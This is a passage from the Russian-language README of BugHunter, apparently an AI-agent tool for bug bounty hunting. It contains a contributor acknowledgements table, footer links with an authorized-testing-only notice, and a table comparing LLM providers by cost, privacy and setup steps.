</p>
---
## Благодарности
<p align="center">
<b>29 человек</b> внесли вклад в BugHunter. Нажмите на любой аватар, чтобы открыть профиль на GitHub.
</p>
<table align="center">
<tr>
<td align="center" width="110">
<a href="https://github.com/shuvonsec">
<img src="https://github.com/shuvonsec.png?size=128" width="64" height="64" alt="shuvonsec"/>
<br/><sub><b>shuvonsec</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/shuv0n">
<img src="https://github.com/shuv0n.png?size=128" width="64" height="64" alt="shuv0n"/>
<br/><sub><b>shuv0n</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/letztek">
<img src="https://github.com/letztek.png?size=128" width="64" height="64" alt="letztek"/>
<br/><sub><b>letztek</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/bertolikimberly">
<img src="https://github.com/bertolikimberly.png?size=128" width="64" height="64" alt="bertolikimberly"/>
<br/><sub><b>bertolikimberly</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/venkatas">
<img src="https://github.com/venkatas.png?size=128" width="64" height="64" alt="venkatas"/>
<br/><sub><b>venkatas</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/DebasishTripathy13">
<img src="https://github.com/DebasishTripathy13.png?size=128" width="64" height="64" alt="DebasishTripathy13"/>
<br/><sub><b>DebasishTripathy13</b></sub>
</a>
</td>
</tr>
<tr>
<td align="center" width="110">
<a href="https://github.com/adityaax">
<img src="https://github.com/adityaax.png?size=128" width="64" height="64" alt="adityaax"/>
<br/><sub><b>adityaax</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/BeargleIndustries">
<img src="https://github.com/BeargleIndustries.png?size=128" width="64" height="64" alt="BeargleIndustries"/>
<br/><sub><b>BeargleIndustries</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/ftacorn">
<img src="https://github.com/ftacorn.png?size=128" width="64" height="64" alt="ftacorn"/>
<br/><sub><b>ftacorn</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/ultra-supara">
<img src="https://github.com/ultra-supara.png?size=128" width="64" height="64" alt="ultra-supara"/>
<br/><sub><b>ultra-supara</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/AurisDSP">
<img src="https://github.com/AurisDSP.png?size=128" width="64" height="64" alt="AurisDSP"/>
<br/><sub><b>AurisDSP</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/Edneam">
<img src="https://github.com/Edneam.png?size=128" width="64" height="64" alt="Edneam"/>
<br/><sub><b>Edneam</b></sub>
</a>
</td>
</tr>
<tr>
<td align="center" width="110">
<a href="https://github.com/depapp">
<img src="https://github.com/depapp.png?size=128" width="64" height="64" alt="depapp"/>
<br/><sub><b>depapp</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/Realgagenichols">
<img src="https://github.com/Realgagenichols.png?size=128" width="64" height="64" alt="Realgagenichols"/>
<br/><sub><b>Realgagenichols</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/H4d3es">
<img src="https://github.com/H4d3es.png?size=128" width="64" height="64" alt="H4d3es"/>
<br/><sub><b>H4d3es</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/thuvh">
<img src="https://github.com/thuvh.png?size=128" width="64" height="64" alt="thuvh"/>
<br/><sub><b>thuvh</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/onlybugs05">
<img src="https://github.com/onlybugs05.png?size=128" width="64" height="64" alt="onlybugs05"/>
<br/><sub><b>onlybugs05</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/savioruz">
<img src="https://github.com/savioruz.png?size=128" width="64" height="64" alt="savioruz"/>
<br/><sub><b>savioruz</b></sub>
</a>
</td>
</tr>
<tr>
<td align="center" width="110">
<a href="https://github.com/Marc-oss-hub">
<img src="https://github.com/Marc-oss-hub.png?size=128" width="64" height="64" alt="Marc-oss-hub"/>
<br/><sub><b>Marc-oss-hub</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/Paebak">
<img src="https://github.com/Paebak.png?size=128" width="64" height="64" alt="Paebak"/>
<br/><sub><b>Paebak</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/NaorYaacov">
<img src="https://github.com/NaorYaacov.png?size=128" width="64" height="64" alt="NaorYaacov"/>
<br/><sub><b>NaorYaacov</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/nurazhardotcom">
<img src="https://github.com/nurazhardotcom.png?size=128" width="64" height="64" alt="nurazhardotcom"/>
<br/><sub><b>nurazhardotcom</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/OctoBored">
<img src="https://github.com/OctoBored.png?size=128" width="64" height="64" alt="OctoBored"/>
<br/><sub><b>OctoBored</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/prodmanpd">
<img src="https://github.com/prodmanpd.png?size=128" width="64" height="64" alt="prodmanpd"/>
<br/><sub><b>prodmanpd</b></sub>
</a>
</td>
</tr>
<tr>
<td align="center" width="110">
<a href="https://github.com/SeekAndExploit">
<img src="https://github.com/SeekAndExploit.png?size=128" width="64" height="64" alt="SeekAndExploit"/>
<br/><sub><b>SeekAndExploit</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/Shawanga">
<img src="https://github.com/Shawanga.png?size=128" width="64" height="64" alt="Shawanga"/>
<br/><sub><b>Shawanga</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/zeze-zeze">
<img src="https://github.com/zeze-zeze.png?size=128" width="64" height="64" alt="zeze-zeze"/>
<br/><sub><b>zeze-zeze</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/grave0x">
<img src="https://github.com/grave0x.png?size=128" width="64" height="64" alt="grave0x"/>
<br/><sub><b>grave0x</b></sub>
</a>
</td>
<td align="center" width="110">
<a href="https://github.com/kevinaimonster">
<img src="https://github.com/kevinaimonster.png?size=128" width="64" height="64" alt="kevinaimonster"/>
<br/><sub><b>kevinaimonster</b></sub>
</a>
</td>
</tr>
</table>
<p align="center">
<a href="https://github.com/Awarexone/Agentic-Bug-Hunter/graphs/contributors"><img src="https://img.shields.io/github/contributors/Awarexone/Agentic-Bug-Hunter?style=for-the-badge&color=7F55FF&label=contributors" alt="Contributors"/></a>
<a href="#contributing"><img src="https://img.shields.io/badge/+-Add_your_name-24292F?style=for-the-badge" alt="Contribute"/></a>
</p>
---
<p align="center">
<a href="https://github.com/shuvonsec">GitHub</a>
·
<a href="https://x.com/awarexone">Twitter</a>
·
<a href="mailto:[email protected]">[email protected]</a> · <a href="mailto:[email protected]">[email protected]</a><br>
<b>Создано баг-хантерами для баг-хантеров.</b><br>
<sub>Лицензия MIT · Только для авторизованного тестирования безопасности. Всегда тестируйте в рамках одобренной программы bug bounty.</sub>
</p>
<p align="center">
<a href="https://awarexone.com">
<img src="https://raw.githubusercontent.com/awarexone/Agentic-Bug-Hunter/main/assets/awarexone-logo.webp" alt="AwareXone" width="56"/>
</a>
<br/>
<sub>Работает на <a href="https://awarexone.com"><b>AwareXone.com</b></a></sub>
<br/>
<sub>
<a href="https://awarexone.com">Сайт</a> ·
<a href="https://x.com/awarexone">X / Twitter</a> ·
<a href="https://github.com/Awarexone">GitHub</a>
</sub>
</p>
| Провайдер | Стоимость | Приватность | Скорость | Начало работы |
|---|
| Ollama | 100% бесплатно · работает локально | Полная — остаётся на вашей машине | Быстро | ollama pull qwen2.5:14b |
| Groq | Доступен бесплатный тариф | Облако | Очень быстро | console.groq.com → получить API-ключ |
| DeepSeek | Очень дёшево (v4-flash / v4-pro) | Облако | Быстро | platform.deepseek.com |
| Claude API | Платно | Облако | Быстро | console.anthropic.com |
| OpenAI | Платно | Облако | Быстро | platform.openai.com |
| Grok (xAI) | Платно | Облако | Быстро | console.x.ai → grok-4.5 |
| OpenRouter | Подписка / оплата по мере использования | Облако | Быстро | openrouter.ai/keys → получить API-ключ |
| OrcaRouter | Подписка / оплата по мере использования | Облако | Быстро | orcarouter.ai → получить API-ключ |
| Fluxion | Подписка / оплата по мере использования | Облако | Быстро | fluxionai.world → получить API-ключ · docs · Model Plaza |
| LiteLLM | Использует ваши существующие ключи провайдеров | Облако / самостоятельно размещённый прокси | Быстро | docs.litellm.ai → единый шлюз для 100+ моделей |
| Requesty | Оплата по мере использования | Облако | Быстро | app.requesty.ai/api-keys → получить API-ключ · docs |